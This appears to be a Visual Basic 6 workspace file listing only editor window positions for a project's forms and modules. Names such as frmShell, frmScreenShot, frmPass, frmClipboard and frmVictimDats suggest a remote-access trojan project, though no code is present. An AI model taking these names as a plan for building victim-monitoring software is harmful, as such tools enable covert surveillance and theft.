modSend = 0, 0, 0, 0, C
frmInitialize = 0, 0, 0, 0, C, 0, 0, 0, 0, C
frmChatConfig = 0, 0, 0, 0, C, 0, 0, 0, 0, C
frmChat = 0, 0, 0, 0, C, 0, 0, 0, 0, C
frmClipboard = 0, 0, 0, 0, C, 0, 0, 0, 0, C
frmInfo = 0, 0, 0, 0, C, 0, 0, 0, 0, C
frmMain = 50, 50, 860, 614, Z, 25, 25, 718, 626, C
frmMSG = 0, 0, 0, 0, C, 0, 0, 0, 0, C
frmMSN = 0, 0, 0, 0, C, 0, 0, 0, 0, C
frmNETOptions = 0, 0, 0, 0, C, 0, 0, 0, 0, C
frmNotify = 0, 0, 0, 0, C, 0, 0, 0, 0, C
frmPass = 0, 0, 0, 0, C, 0, 0, 0, 0, C
frmPing = 0, 0, 0, 0, C, 0, 0, 0, 0, C
frmPorts = 0, 0, 0, 0, C, 0, 0, 0, 0, C
frmPrinter = 0, 0, 0, 0, C, 0, 0, 0, 0, C
frmProcess = 0, 0, 0, 0, C, 0, 0, 0, 0, C
frmScripts = 0, 0, 0, 0, C, 0, 0, 0, 0, C
frmShell = 0, 0, 0, 0, C, 0, 0, 0, 0, C
modSocketMaster = 0, 0, 0, 0, C
CSocketMaster = 0, 0, 0, 0, C
modNotify = 0, 0, 0, 0, C
modAPIS = 0, 0, 0, 0, C
frmScreen = 0, 0, 0, 0, C, 0, 0, 0, 0, C
frmShutdown = 0, 0, 0, 0, C, 0, 0, 0, 0, C
frmScreenShot = 0, 0, 0, 0, C, 0, 0, 0, 0, C
modRegValues = 0, 0, 0, 0, C
frmVictimDats = 0, 0, 0, 0, C, 0, 0, 0, 0, C
